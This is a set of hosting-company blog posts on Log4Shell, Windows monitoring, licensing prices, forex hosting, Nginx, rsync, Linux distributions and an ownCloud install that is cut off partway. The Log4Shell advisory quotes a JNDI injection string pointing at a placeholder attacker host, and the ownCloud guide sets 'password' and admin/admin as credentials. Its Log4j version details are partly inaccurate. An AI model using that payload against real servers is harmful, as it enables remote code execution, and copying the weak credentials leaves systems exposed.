Zimbra announces that the zero-day exploit vulnerability for Log4j (CVE-2021-44228) does not affect the current supported Zimbra versions 9.0.0 and 8.8.15.

This is announcement published by Synacor regarding the zero-day exploit vulnerability for Log4j

After intensive review and testing, Zimbra Development determined that the zero-day exploit vulnerability for Log4j (CVE-2021-44228) does not affect the current supported Zimbra versions 9.0.0 and 8.8.15.

Zimbra Collaboration Server currently uses Log4j version 1.2.16. The cause of the vulnerability is found in the lookup expression feature in Log4j versions 2.0 to 2.17.

Also, the Redhat (CVE-2021-4104) vulnerability does not affect the current Supported Zimbra Collaboration Server versions 9.0.0 and 8.8.15. For this vulnerability to affect the server, it needs JMSAppender and the ability to append configuration files. Zimbra does not use the JMSAppender.

The Zimbra Development team is in the process of upgrading Log4j which is expected to be completed within Q1 2022.

Read more about the Log4j vulnerability and how to protect your organization’s infrastructure.

In this article we will help you understand what Apache Log4J is, what the Log4Shell vulnerability can cause, a list of the most popular systems and devices using the Log4j library and, finally, a list of useful links on how to scan and patch your online systems.

On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported by the Apache Software Foundation which can now tracked under CVE-2021-44228. It is known by the names Log4Shell and LogJam.

The Log4j vulnerability is a zero-day vulnerability. This means it has been published before the relevant vendors can release patches to their software. So workarounds are being used where appropriate while we wait for patches to be released.

In this article we will help you understand what Apache Log4J is, what the Log4Shell vulnerability can cause, a list of the most popular systems and devices using the Log4j library and, finally, a list of useful links on how to scan and patch your online systems.

What is Log4J?

Log4j is a java-based logging package used by developers to log errors in both Linux and Windows platforms.

The Log4j library is frequently in Java applications and is included in Apache frameworks including Apache Struts2, Apache Solr, Apache Druid, APache Flink and Apache Swift.

Currently, Version 1 of the Log4j library is no longer supported and Developers should migrate to the latest version (Log4j 2.16.0).

Read more about Apache Log4j v2 here.

What Does Log4Shell Vulnerability Do?

The Log4Shell vulnerability (CVE-2021-44228) is classified under the highest severity mark and allows an attacker to execute arbitrary code by injecting a sub-string in the form “${jndi:ldap://some.attacker-controlled.site/}” into a logged message.

According to the National Vulnerability Database (NVD), it’s rated as 10.0 CVSSv3 which is the worst possible. If successfully exploited, attackers can conduct a Remote Code Execution (RCE) attack which can be used to compromise servers and online devices.

Which Software and Devices are Vulnerable?

After an extensive research we have summarized a list of websites that present a list of Vendors and Software which are vulnerable to the Log4j 0day threat.

1. https://github.com/NCSC-NL/log4shell/blob/main/software/README.md
2. https://www.continuitysoftware.com/blog/centralized-list-of-storage-and-backup-systems-affected-by-zero-day-log4shell-vulnerability-cve-2021-44228/
3. https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
4. https://github.com/cisagov/log4j-affected-db
5. https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages

How To Discover Log4j within your Infrastructure

The first step you need to do is to check if Log4j is installed anywhere within your infrastructure’s online applications and devices. For this we recommend that you do a file system search for log4j, including searching within EAR, JAR and WAR files.

Sample Commands:

find / -type f -print0 |xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

dpkg -l | grep log4j

How To Protect from Log4j Vulnerability

The first course of action to protect from the Log4j vulnerability is to download & install the latest updates from the software vendors. When a vendor has not provided an update to product, the vulnerability can be mitigated in previous releases of Log4j (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or by removing the JndiLookup class from the classpath.

If you are using a software which is not known to be exposed to this vulnerability, you can still use the commands given above, to detect any instances of the Log4j and any dependent packages which may exist within your infrastructure.

More information about the Log4j/2 patch can be found here:

• https://logging.apache.org/log4j/2.x/security.html
• https://logging.apache.org/log4j/2.x/download.html

Moreover, IT administrators should consider taking proactive measures within their organizations infrastructure. The recommended Log4Shell proactive measures are:

1. Block suspicious outbound traffic, such as LDAP and RMI, with the use of a Firewall.
   
2. Disable JNDI lookup:
   • Setup log4j2.formatMsgNoLookups=true
   • Remove the JndiLookup file in the log4j-core and restart the service
     
3. Disable JNDI
   • Setup spring.jndi.ignore=true

The following article from Naked Security tells you what you need to know, and how to fix it.

https://nakedsecurity.sophos.com/2021/12/13/log4shell-explained-how-it-works-why-you-need-to-know-and-how-to-fix-it/

How can NetShop ISP Help You?

Customers with Managed Services and/or Premium SLA can contact us for assistance in detecting and patching your systems so you are protected from the Log4Shell.

Customers with Unmanaged Servers who don’t have the expertise or in-house resources to handle the Log4j vulnerability can still contact us and we will promptly get back to you for the next step.

In this article we will demonstrate how you can monitor CPU and Memory consumption in real-time and find out which processes consume the most resources.

This guide applies to the following Windows Server editions: 2012, 2012 R2, 2016 and 2019.

A common headache for System Admins is when a Windows Server becomes sluggish, unresponsive or even shuts down itself. This behaviour is often caused by application processes which demand too many resources for a long period of time that the Windows Server cannot accommodate.

In this article we will demonstrate how you can monitor CPU and Memory consumption in real-time and find out which processes consume the most resources.

Real-time CPU and Memory Monitoring

Below we explain the best 3 ways of monitoring the CPU and Memory usage on a Windows Server.

A. Task Manager

1. To access Task Manager, right-click the taskbar and then click Task Manager.
   
2. Click the Processes tab.
   
3. Click the CPU or Memory headers at the top of the table to sort by usage.

The processes consuming more resources are sorted at the top of the list.

B. Resource Monitor (resmon)

The Resource Monitor application is a Windows utility which allows you to monitor resources.

1. To access it, open the Run dialogue, type resmon in the text box and hit Enter.
   
2. To view CPU usage, click the CPU tab.
   
3. Click the Average CPU column to sort by overall CPU usage. If the higher CPU values are not on top, then click the column once more to adjust the sorting from high to low.

C. Process Monitor by SysInternals

Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry and process/thread activity. It combines the features of two legacy Sysinternals utilities; Filemon and Regmon.

1. Open a web browser from within your Windows Server and download Process Monitor.
   
2. Extract the zip archive and double-click the 64-bit or 32-bit executable to run the utility.

Hassle-free Windows Server Administration by NetShop ISP

Managed Services are ideal for companies (of any size) with insufficient resources to manage a single or multiple Windows Servers. Our experienced and certified Windows Server administrators will ensure your servers are monitored 24/7 and all updates and security patches are installed.

Furthermore our managed services include the following:

• Security Hardening
• OS Troubleshooting
• Performance Tuning
• Backups & Disaster Recovery
• Software Installation
• Hardware Checks & Replacement
• DDoS Mitigation
• Network Administration

Contact us today to learn more about the Managed Services plan which best fits your organization needs.

Microsoft have now made official to its Partners Network that specific products & licenses will have a price increase effective 1st of January 2022.

Microsoft have now made official to its Partners Network that specific products & licenses will have a price increase effective 1^st of January 2022.

Below is the table of products that are impacted by the price increase:

Product Family	Price Increase
Windows Remote Desktop SVCS SAL	10%
Windows Rights Management Services CAL	10%
Windows Server DataCenter Core	10%
Windows Server Standard Core	10%
Core Infrastructure Svr Ste DC Core	7%
Core Infra Svr Ste DC Core	5%
Office Professional Plus	10%
Office Standard	10%
Office Multi Language Pack	10%
Project Professional	10%
Project Server	10%
Project Standard	10%
Visio Professional	10%
Visio Standard	10%
Visio Studio Enterprise	10%
Visio Studio Professional	10%
Visio Studio Test Professional	10%

Windows Server 2022 FAQ

1. When will Windows Server 2022 be generally available in SPLA?

Windows Server 2022 was generally available in second half of August 2021 and was available in SPLA starting September 2021.

2. How much will Window Server 2022 cost?

The Service Provider License Agreement (SPLA) program will see price changes similar to price changes in commercial licensing:
• Windows Server Standard Edition prices will increase 10%
• Windows Server Datacenter Edition prices will increase 10%
• Windows Server is also available in SPLA as part of CIS suites. Prices for CIS Standard will increase by 5% and for CIS Datacenter by 7%.

New prices will be effective January 1, 2022.

3. Does the price increase affect older editions of Windows Server (2008, 2012, 2016, 2019)?

Yes, as we provision the licenses through SPLA the price increase affects editions older than 2022 as well.

4. Are there any changes to licensing model for Windows Server 2022?

There are no changes to the licensing model for Windows Server 2022 Standard and Datacenter Editions

5. What are the new Remote Desktop Services (RDS) capabilities in Windows Server 2022?

Microsoft expanded its high availability support to the RDS licensing server, allowing customers to deploy multiple licensing servers for additional resiliency. Furthermore, since the launch of Windows Server 2019, Microsoft also introduced a number of new capabilities in web-client and RDS fundamentals.

Customers using RDS have been able to take advantage of improved experience for 4K and ultra-wide monitors and enhanced accessibility with improved screen reader compatibility. Furthermore, customers have seen improvements in resource management.

For example, Users can open resources via web-browser or by downloading .rdp to manage using another client. Finally, RDS supports offline use on internal networks. In addition, improvements to the RDS protocol bring improvements to remote content streaming. An improved display driver model for multisession VMs, and improvements to the protocol’s use of hardware, will mean better graphics performance and reliability for some users.

6. How much will RDS SALs for Windows Server 2022 Cost?

RDS SAL prices will increase by 10%. New prices will be effective January 1, 2022.

7. I am currently using an older version of Windows Server. Can I upgrade?

Yes, upgrades are possible between Microsoft Windows Server editions. Please contact our Customer Service team with information about your current edition so we can advise you further.

NetShop ISP’s dedicated Forex Hosting Solutions cater to clients seeking to directly access and communicate with Liquidity Providers and other financial data partners in global Equinix data centers. In this article we provide insights on how FX Brokers and LPs can achieve ultra-low latency through their infrastructure.

Since the rapid incline of high-frequency trading in the early 2000’s, low latency has been a focal point amongst financial markets. Cutting-edge technology has seen tick-to-trade become the metric that matters – with intervals less than just one microsecond meaning that latency has subsequently been replaced with ultra-low latency (ULL) in liquid markets.

Related Article: How to start trading Forex with low latency

Achieving ultra-low latency cannot be attained by any single product, but rather a combination of both technology and strategic networking decisions required in order to create the optimal trading environment. That’s why, in this article, we’ve broken down all of the necessary components needed for faster trading operations.

How your trading strategy affects ultra-low latency

Certain trading strategies, like algorithmic trading models for instance, are completely dependent on ultra-low latency to enable the seamless execution of tens of thousands of trades per second. With trading infrastructure for latency-sensitive strategies requiring a substantial investment, it’s important to assess whether the costs of achieving ultra-low latency are worthwhile in terms of your overall trading strategy.

Distinguishing between latency sensitivity and latency dependency is the first step in ascertaining the infrastructure required to execute your trading strategies, as there is a stark difference between the two.

A latency-sensitive strategy is one in which the execution of faster trades certainly generates a higher return, but can still be accomplished without ultra-low latency. Generally, these strategies are built over multiple markets, making ultra-low latency for each exchange difficult to achieve due to market fragmentation. In this case, certain network decisions like choosing quality connections between data centers can heavily reduce latency.

In contrast, ultra-low latency is fundamental for latency-dependent strategies, where the loss of a single nanosecond could be detrimental to a trade’s successful execution. These strategies are practical in a single-market situation, where tick-to-trade optimization can be implemented between your infrastructure and the exchange.

Infrastructure for ultra-low latency

In trading, latency is defined by the time delay between any two points of an infrastructure. It’s crucial to consider tick-to-trade latency when building your trading architecture, as the trade performance metric denotes the time interval between receiving market data and sending the trading order. A strong emphasis on the networking between your hardware and that of the trading exchange is essential when evaluating this latency measure.

Although expensive, colocation and market data feeds directly from the exchanges are often required to achieve ultra-low latency. Put simply, the distance in which data has to travel directly corresponds with the amount of time it takes to be received. Thus, to reduce physical distance, many firms opt for colocation of their rack space in the same data centers as exchanges, and cross-connects to increase performance. Additionally, by receiving exchange direct-feed data rather than market data via consolidated feeds from SIPs, latency can be further reduced in order to achieve ULL.

Hardware must also be considered when evaluating network latency, with new hardware potentially contributing to 50% less latency. The network switches at each point of the trading infrastructure play a crucial role for tick-to-trade latency, as they manage how data is communicated across the network and therefore are a key component in aligning your network to meet trading opportunities with ULL.

Interconnected Global Network Infrastructure  

NetShop ISP’s dedicated Forex Hosting Solutions cater to clients seeking to directly access and communicate with Liquidity Providers and other financial data partners in global Equinix data centers. Available for both start-ups and larger financial entities, our solution offers a premium environment for any Brokerage looking to achieve ultra-low latency and optimal hosting of their MT4/MT5 and cTrader servers.

NetShop ISP’s in-house experts work closely with clients to create tailored solutions for their specific needs, while also providing proactive 24/7 business and technical support. Our enterprise-grade infrastructure provides the sub-millisecond connectivity that is essential for creating a superior trading environment. NetShop ISP operates a fully redundant global network in London, Amsterdam, Singapore and Cyprus with cross-connectivity in all major Equinix data centers.

Contact us to discuss your Infrastructure requirements with our dedicated Forex hosting specialists.

One of the most common errors system admins encounter is when users complain that their file upload couldn’t complete. In this article, we will demonstrate how to limit file upload size in Nginx.

In this article, we will demonstrate how to limit file upload size in Nginx. One of the most common errors system admins encounter is when users complain that their file upload couldn’t complete. The error associated with this issue is client intended to send too large body and can be found in /var/log/nginx/error.log.

Apart from the need to increase the file upload size, webmasters or sysadmins need to restrict the file upload size to prevent some types of denial-of-service (DOS) attacks.

By default, Nginx has a limit of 1MB for file uploads. The directive responsible for this is the client_max_body_size which is part of the Nginx’s ngx_http_core_module.

In order to change the default 1MB limit, you need to use the directive in /etc/nginx/nginx.conf file as follows:

1. Set in http block (affects all virtual hosts)

http {
    ...
   
 client_max_body_size 100M;
}  

2. Set in server block (affects a particular virtual host)

server {
    ...
 
   client_max_body_size 100M;
}

3. Set in php block (affects all php files within a site/app)

location ~ \.php$ { 
    ...
  
    client_max_body_size 100M;
} 

Once you do the necessary changes, save the nginx.conf file and restart the Nginx web server to apply the changes, as follows:

nginx -t // dry-run to ensure no syntax errors exist

systemctl restart nginx // restart to apply the saved changes

NetShop ISP, the leading cloud & web hosting company based in Cyprus, announces Black Friday & Cyber Monday discounts up to 50% for the entire week.

NetShop ISP, the leading cloud & web hosting company based in Cyprus, announces the launch of its 2021 Black Friday & Cyber Monday (BFCM) campaign.

The BFCM Hosting offers start today, Monday 22nd of November 2021, and coupon codes will be active for all orders submitted until Monday 29th of November 2021 22:59 CET.

• 50% Discount on all cPanel Web Hosting plans (Coupon code: BFCM50)
• 40% Discount on all Cloud VPS plans (Coupon code: BFCM40)
• 30% Discount on all Bare-metal Servers plans (Coupon code: BFCM30)

To view all Black Friday & Cyber Monday offers and terms please visit https://netshop-isp.com.cy/offers/black-friday-cyber-monday/

The international exhibition SiGMA Europe 2021 for online gaming, gambling and betting professionals ended today. SiGMA is one of the largest and most important exhibitions of the igaming industry, which took place live in Malta after a one-year break.

The international exhibition SiGMA Europe 2021 for online gaming, gambling and betting professionals ended today. SiGMA is one of the largest and most important exhibitions of the igaming industry, which took place live in Malta after a one-year break.

Despite the pandemic, the event attracted almost 20,000 participants, representing companies from Europe, Africa, America and Asia from which 23% were operators, 20% suppliers and 17% affiliates.

NetShop ISP, a multi-awarded iGaming Hosting Services Provider, exhibited at Booth ST92. The company presented its Cloud hosting platform, Virtual and Dedicated Servers, Colocation Services and its award-winning Disaster Recovery solutions.

NetShop ISP was represented by its CEO (Stefano Sordini), Head of Sales (Katerina Burtsava), iGaming Product Specialist (Kateryna Nechaieva) and Lorenzo Sordini, member of the Board of Directors.

During the 3-day exhibition at the MFCC arena, the company’s representatives had over 55 meetings with existing customers and partners, as well as new prospects interested in hosting services for B2C and B2B igaming platforms.

In summary, NetShop ISP has presented the following igaming oriented hosting services:

• Scalable Cloud platform for deploying servers in Europe and Asia
• Dedicated Servers and Colocation Hosting in Regulatory compliant Data Centers in Malta, United Kingdom, Netherlands, Singapore and Cyprus
• Data Backup and Disaster Recovery services compatible with igaming companies hosted primarily in Amazon AWS or Microsoft Azure

For more information or to arrange a web meeting with our iGaming specialists please contact us via this link.

In this tutorial we will explain how Rsync works and how you can use it for transferring files and folders from and to Linux Servers. In the end of this tutorial you can also find an Rsync Cheat Sheet with explanation of rsync command parameters.

Nowadays Linux system admins have a lot of tools and options to facilitate the transfer of data and files from and to servers. SSH and FTP are the most popular protocols for data transfer. FTP, in one hand, is popular due to its ease of use but, on the other hand, SSH is far more secure and reliable.

For SSH-based data transfer scp and sftp are two specialized tools used by system admins for many years. However, none of these offer all the features and capabilities that rsync provides.

In this tutorial we will explain how Rsync works and how you can use it for transferring files and folders from and to Linux Servers. In the end of this tutorial you can also find an Rsync Cheat Sheet with explanation of rsync command parameters.

What is RSync

rsync is a utility for efficiently transferring and synchronizing files between computers and servers across local and public networks (source: https://en.wikipedia.org/wiki/Rsync). Rsync stands for “remote sync” and it uses an algorithm that minimizes the amount of data copied by only transferring files which have changed.

How to Install Rsync on Linux Server

To install Rsync on your Linux server, you can use the following commands below according to your Linux distribution:

sudo apt-get install rsync // for Debian/Ubuntu
pacman -S rsync // for Arch Linux
sudo dnf install rsync // for Fedora/CentOS/RHEL and Rocky Linux/AlmaLinux

Example 1: Copy an Entire Directory from Local Server to a Remote Server

Assuming you are connected on a Server A and you wish to transfer an entire directory named public_html which is under “/home” to a Server B (IP: 192.168.1.3), you can use the following command:

rsync -arvzh /home/public_html root@192.168.1.3:/home/

Example 2: Copy a Directory from Remote Server to a Local machine

The following command will help you sync the entire directory /var/backup from a remote server (IP: 192.168.1.3) to a server you are currently connected:

rsync -arvzh root@192.168.1.3:/var/backup /var/

Example 3: Use RSync for Files Transfer between Servers with Custom SSH Port

If you wish to transfer files to a Server which uses a non-standard SSH Port, then you need to supply the rsync command with the -e argument and specify the custom SSH port that the destination server uses. In our example below we assume that the SSH port is 2222, and we are going to transfer the file /home/public_html/index.html.

rsync -avzh -e 'ssh -p 2222' /home/public_html/index.html root@192.168.1.3:/home/public_html/

Example 4: Automatically Delete Files on Source Server after Successful Transfer

In cases when you are initiating data transfer for, lets say, backup purposes you may want to have the files on the originating server deleted after they have been transferred to the backup/destination server.

rsync -avzh --remove-source-files /root/backup.tar.gz root@192.168.1.3:/root/

Example 5: Test RSync Command with Dry Run

If you are not yet familiar with rsync, you may not want to execute commands that may mess up your data on source or destination servers. In this case, rsync provides a wonderful parameter that will not make any real changes but instead will show the output of what your command would do.

rsync -avzh --dry-run /root/backup.tar.gz root@192.168.1.3:/root/

Sample Output:

[root@ubuntu-server:~]# rsync --dry-run --remove-source-files -zvh /root/backup.tar.gz root@192.168.1.3:/root/

root@192.168.1.3's password: 
backup.tar.gz

sent 50 bytes  received 94 bytes  95.15 bytes/sec
total size is 267.30K  speedup is 3,873.97 (DRY RUN)

Rsync Cheat Sheet

Here is a cheat sheet for all rsync’s arguments which you may need to supply in your command for data transfer/sync.

-v, –verbose	increase verbosity
-q, –quiet	suppress non-error messages
–no-motd	suppress daemon-mode MOTD (see caveat)
-c, –checksum	skip based on checksum, not mod-time & size
-a, –archive	archive mode; equals -rlptgoD (no -H,-A,-X)
–no-OPTION	turn off an implied OPTION (e.g., –no-D)
-r, –recursive	recurse into directories
-R, –relative	use relative path names
–no-implied-dirs	don’t send implied dirs with –relative
-b, –backup	make backups (see –suffix & –backup-dir)
–backup-dir=DIR	make backups into hierarchy based in DIR
–suffix=SUFFIX	backup suffix (default ~ w/o –backup-dir)
-u, –update	skip files that are newer on the receiver
–inplace	update destination files in-place
–append	append data onto shorter files
–append-verify	–append w/old data in file checksum
-d, –dirs	transfer directories without recursing
-l, –links	copy symlinks as symlinks
-L, –copy-links	transform symlink into referent file/dir
–copy-unsafe-links	only “unsafe” symlinks are transformed
–safe-links	ignore symlinks that point outside the tree
-k, –copy-dirlinks	transform symlink to dir into referent dir
-K, –keep-dirlinks	treat symlinked dir on receiver as dir
-H, –hard-links	preserve hard links
-p, –perms	preserve permissions
-E, –executability	preserve executability
–chmod=CHMOD	affect file and/or directory permissions
-A, –acls	preserve ACLs (implies -p)
-X, –xattrs	preserve extended attributes
-o, –owner	preserve owner (super-user only)
-g, –group	preserve group
–devices	preserve device files (super-user only)
–specials	preserve special files
-D	same as –devices –specials
-t, –times	preserve modification times
-O, –omit-dir-times	omit directories from –times
–super	receiver attempts super-user activities
–fake-super	store/recover privileged attrs using xattrs
-S, –sparse	handle sparse files efficiently
-n, –dry-run	perform a trial run with no changes made
-W, –whole-file	copy files whole (w/o delta-xfer algorithm)
-x, –one-file-system	don’t cross filesystem boundaries
-B, –block-size=SIZE	force a fixed checksum block-size
-e, –rsh=COMMAND	specify the remote shell to use
–rsync-path=PROGRAM	specify the rsync to run on remote machine
–existing	skip creating new files on receiver
–ignore-existing	skip updating files that exist on receiver
–remove-source-files	sender removes synchronized files (non-dir)
–del	an alias for –delete-during
–delete	delete extraneous files from dest dirs
–delete-before	receiver deletes before transfer, not during
–delete-during	receiver deletes during the transfer
–delete-delay	find deletions during, delete after
–delete-after	receiver deletes after transfer, not during
–delete-excluded	also delete excluded files from dest dirs
–ignore-errors	delete even if there are I/O errors
–force	force deletion of dirs even if not empty
–max-delete=NUM	don’t delete more than NUM files
–max-size=SIZE	don’t transfer any file larger than SIZE
–min-size=SIZE	don’t transfer any file smaller than SIZE
–partial	keep partially transferred files
–partial-dir=DIR	put a partially transferred file into DIR
–delay-updates	put all updated files into place at end
-m, –prune-empty-dirs	prune empty directory chains from file-list
–numeric-ids	don’t map uid/gid values by user/group name
–timeout=SECONDS	set I/O timeout in seconds
–contimeout=SECONDS	set daemon connection timeout in seconds
-I, –ignore-times	don’t skip files that match size and time
–size-only	skip files that match in size
–modify-window=NUM	compare mod-times with reduced accuracy
-T, –temp-dir=DIR	create temporary files in directory DIR
-y, –fuzzy	find similar file for basis if no dest file
–compare-dest=DIR	also compare received files relative to DIR
–copy-dest=DIR	… and include copies of unchanged files
–link-dest=DIR	hardlink to files in DIR when unchanged
-z, –compress	compress file data during the transfer
–compress-level=NUM	explicitly set compression level
–skip-compress=LIST	skip compressing files with suffix in LIST
-C, –cvs-exclude	auto-ignore files in the same way CVS does
-f, –filter=RULE	add a file-filtering RULE
-F	same as –filter=’dir-merge /.rsync-filter’ repeated: –filter=’- .rsync-filter’
–exclude=PATTERN	exclude files matching PATTERN
–exclude-from=FILE	read exclude patterns from FILE
–include=PATTERN	don’t exclude files matching PATTERN
–include-from=FILE	read include patterns from FILE
–files-from=FILE	read list of source-file names from FILE
-0, –from0	all *from/filter files are delimited by 0s
-s, –protect-args	no space-splitting; wildcard chars only
–address=ADDRESS	bind address for outgoing socket to daemon
–port=PORT	specify double-colon alternate port number
–sockopts=OPTIONS	specify custom TCP options
–blocking-io	use blocking I/O for the remote shell
–stats	give some file-transfer stats
-8, –8-bit-output	leave high-bit chars unescaped in output
-h, –human-readable	output numbers in a human-readable format
–progress	show progress during transfer
-P	same as –partial –progress
-i, –itemize-changes	output a change-summary for all updates
–out-format=FORMAT	output updates using the specified FORMAT
–log-file=FILE	log what we’re doing to the specified FILE
–log-file-format=FMT	log updates using the specified FMT
–password-file=FILE	read daemon-access password from FILE
–list-only	list the files instead of copying them
–bwlimit=KBPS	limit I/O bandwidth; KBytes per second
–write-batch=FILE	write a batched update to FILE
–only-write-batch=FILE	like –write-batch but w/o updating dest
–read-batch=FILE	read a batched update from FILE
–protocol=NUM	force an older protocol version to be used
–iconv=CONVERT_SPEC	request charset conversion of file names
–checksum-seed=NUM	set block/file checksum seed (advanced)
-4, –ipv4	prefer IPv4
-6, –ipv6	prefer IPv6
–version	print version number
-h, –help	show help

The two Operating Systems that dropped in as a replacement for CentOS are AlmaLinux and RockyLinux. Deploying AlmaLinux and RockyLinux on Cloud or Bare-metal servers is free of charge. Both Operating Systems are based on RHEL source code with frequent security updates and large community support.

Following RedHat’s announcement (December 2020) to drop CentOS for CentOS stream, a lot of discussion has occurred among IT professionals on how to find the best open-source replacement.

The two Operating Systems that dropped in as a replacement for CentOS are AlmaLinux and RockyLinux.

AlmaLinux and RockyLinux on Cloud

Deploying AlmaLinux and RockyLinux on Cloud or Bare-metal servers is free of charge. Both Operating Systems are based on RHEL source code with frequent security updates and large community support.

Whilst there is no Vendor-supplied paid support available, AlmaLinux and RockyLinux received a warm hug by the IT industry especially by those freelancers, hosting providers and IT pros who are looking for a purely free, open-source replacement for CentOS 8.

RHEL vs AlmaLinux and RockyLinux Comparison

	RHEL	AlmaLinux	RockyLinux
Free of Use	No	Yes	Yes
Vendor Paid Support	Yes	No	No
Developer Community	No	Yes	Yes
Regular Security Updates	Yes	Yes	Yes
RHEL source code based	Yes	Yes	Yes

About AlmaLinux

AlmaLinux, founded by the team behind CloudLinux, is an Open Source, community owned and governed, forever-free enterprise Linux distribution, focused on long-term stability, providing a robust production-grade platform. AlmaLinux OS is 1:1 binary compatible with RHEL and pre-Stream CentOS.

Visit AlmaLinux website: https://almalinux.org/

About RockyLinux

Rocky Linux is a community enterprise operating system designed to be 100% bug-for-bug compatible with America’s top enterprise Linux distribution now that its downstream partner has shifted direction. It is under intensive development by the community. Rocky Linux is led by Gregory Kurtzer, founder of the CentOS project.

Visit RockyLinux website: https://rockylinux.org/

Deploy a CentOS 8 Alternative OS on our Cloud

As of today, Monday 8th of November 2021, RockyLinux and AlmaLinux have been included at NetShop ISP’s Cloud and Bare-metal Dedicated Servers.

For new server deployments, you can choose your favorite distro from the OS drop-down menu when placing a new order.

If you already have an Operating System installed on your Cloud VPS server, you can easily replace it from within myNetShop Self-service Portal.

Just login to https://my.netshop-isp.com.cy, click on Manage for your desired VPS server and click the “Rebuild OS“.

Then choose your favourite OS, AlmaLinux or RockyLinux, and click Reinstall VPS as shown on the screenshot below.

1st of November 2021 has been a milestone for the two tech giants, as Dell Technologies has officially spin-out its 81% majority stake in VMware to Dell shareholders.

1st of November 2021 has been a milestone for the two tech giants, as Dell Technologies has officially spin-out its 81% majority stake in VMware to Dell shareholders.

The spin-off from Dell Technologies provides VMware enhanced freedom to implement and deliver its multi-cloud strategy, a more simplified capital structure and governance model, and additional operational and financial flexibility. VMware will continue to use Dell Financial Services to help its customers finance their digital transformations.

In an official Investors Press Release, DELL’s Chairman and CEO comments that “Today marks an important milestone for both Dell and VMware. We are unlocking significant value for stakeholders, while maintaining our close partnership in sales, support and innovation for our customers”.

Read VMWare Official Press Release: https://news.vmware.com/releases/vmware-announces-completion-of-spin-off-from-dell-technologies

Read DELL Technologies Official Press Release: https://investors.delltechnologies.com/news-releases/news-release-details/dell-technologies-announces-completion-vmware-spin

This is a step-by-step guide on how to install ownCloud Collaboration software on a fresh installation of Ubuntu 20.04 server. Run the following commands in your terminal to complete the installation.

This is a step-by-step guide on how to install ownCloud Collaboration software on a fresh installation of Ubuntu 20.04 server. Run the following commands in your terminal to complete the installation.

Prerequisites

• A fresh installation of Ubuntu 20.04 with SSH enabled.
• This guide assumes that you are working as the root user.
• Your ownCloud directory will be located in /var/www/owncloud/

Preparation

First, ensure that all the installed packages are entirely up to date, and that PHP is available in the APT repository. To do so, follow the instructions below:

apt update && \
  apt upgrade -y

Create the occ Helper Script

Create a helper script to simplify running occ commands.

Select all the commands below and just copy-paste to the terminal. 

FILE="/usr/local/bin/occ"
/bin/cat <<EOM >$FILE
#! /bin/bash
cd /var/www/owncloud
sudo -E -u www-data /usr/bin/php /var/www/owncloud/occ "\$@"
EOM

Make the helper script executable:

chmod +x /usr/local/bin/occ

Install the Required Packages

Select all the commands below and just copy-paste to the terminal.

apt install -y \
  apache2 \
  libapache2-mod-php \
  mariadb-server \
  openssl \
  php-imagick php-common php-curl \
  php-gd php-imap php-intl \
  php-json php-mbstring php-mysql \
  php-ssh2 php-xml php-zip \
  php-apcu php-redis redis-server \
  wget

Note : php 7.4 is the default version installable with Ubuntu 20.04

Install the Recommended Packages

Select all the commands below and just copy-paste to the terminal.

apt install -y \
  ssh bzip2 rsync curl jq \
  inetutils-ping coreutils

We are ready, now, to proceed with OwnCloud Installation.

Installation Steps

1. Configure Apache

1.1. Change the Document Root

sed -i "s#html#owncloud#" /etc/apache2/sites-available/000-default.conf
service apache2 restart

1.2. Create a Virtual Host Configuration

Select all the commands below and just copy-paste to the terminal.

FILE="/etc/apache2/sites-available/owncloud.conf"
/bin/cat <<EOM >$FILE
Alias /owncloud "/var/www/owncloud/"

<Directory /var/www/owncloud/>
  Options +FollowSymlinks
  AllowOverride All

 <IfModule mod_dav.c>
  Dav off
 </IfModule>

 SetEnv HOME /var/www/owncloud
 SetEnv HTTP_HOME /var/www/owncloud
</Directory>
EOM

2. Enable the Virtual Host Configuration

a2ensite owncloud.conf
service apache2 reload

3. Configure the Database

mysql -u root -e "CREATE DATABASE IF NOT EXISTS owncloud; \
GRANT ALL PRIVILEGES ON owncloud.* \
  TO owncloud@localhost \
  IDENTIFIED BY 'password'";

3.1. Enable the Recommended Apache Modules

echo "Enabling Apache Modules"
a2enmod dir env headers mime rewrite setenvif
service apache2 reload

4. Download ownCloud

cd /var/www/
wget https://download.owncloud.org/community/owncloud-10.8.0.tar.bz2 && \
tar -xjf owncloud-10.8.0.tar.bz2 && \
chown -R www-data. owncloud

5. Install ownCloud

Select all the commands below and just copy-paste to the terminal.

occ maintenance:install \
    --database "mysql" \
    --database-name "owncloud" \
    --database-user "owncloud" \
    --database-pass "password" \
    --admin-user "admin" \
    --admin-pass "admin"

6. Configure ownCloud’s Trusted Domains

myip=$(hostname -I|cut -f1 -d ' ')
occ config:system:set trusted_domains 1 --value="$myip"

7. Set Up a Cron Job

Set your background job mode to cron:

occ background:cron

echo "*/15  *  *  *  * /var/www/owncloud/occ system:cron" \
  > /var/spool/cron/crontabs/www-data
chown www-data.crontab /var/spool/cron/crontabs/www-data
chmod 0600 /var/spool/cron/crontabs/www-data

If you need to sync your users from an LDAP or Active Directory Server, add this additional Cron job. Every 15 minutes this cron job will sync LDAP users in ownCloud and disable the ones who are not available for ownCloud. Additionally, you get a log file in /var/log/ldap-sync/user-sync.log for debugging.

Select all the commands below and just copy-paste to the terminal.

echo "*/15 * * * * /var/www/owncloud/occ user:sync 'OCA\User_LDAP\User_Proxy' -m disable -vvv >> /var/log/ldap-sync/user-sync.log 2>&1" >> /var/spool/cron/crontabs/www-data
chown www-data.crontab  /var/spool/cron/crontabs/www-data
chmod 0600  /var/spool/cron/crontabs/www-data
mkdir -p /var/log/ldap-sync
touch /var/log/ldap-sync/user-sync.log
chown www-data. /var/log/ldap-sync/user-sync.log

8. Configure Caching and File Locking

Execute these commands:

Select all the commands below and just copy-paste to the terminal.

occ config:system:set \
   memcache.local \
   --value '\OC\Memcache\APCu'
occ config:system:set \
   memcache.locking \
   --value '\OC\Memcache\Redis'
occ config:system:set \
   redis \
   --value '{"host": "127.0.0.1", "port": "6379"}' \
   --type json

9. Configure Log Rotation

Execute this command to set up log rotation.

Select all the commands below and just copy-paste to the terminal.

FILE="/etc/logrotate.d/owncloud"
sudo /bin/cat <<EOM >$FILE
/var/www/owncloud/data/owncloud.log {
  size 10M
  rotate 12
  copytruncate
  missingok
  compress
  compresscmd /bin/gzip
}
EOM

10. Finalize the Installation

Make sure the permissions are correct.

cd /var/www/
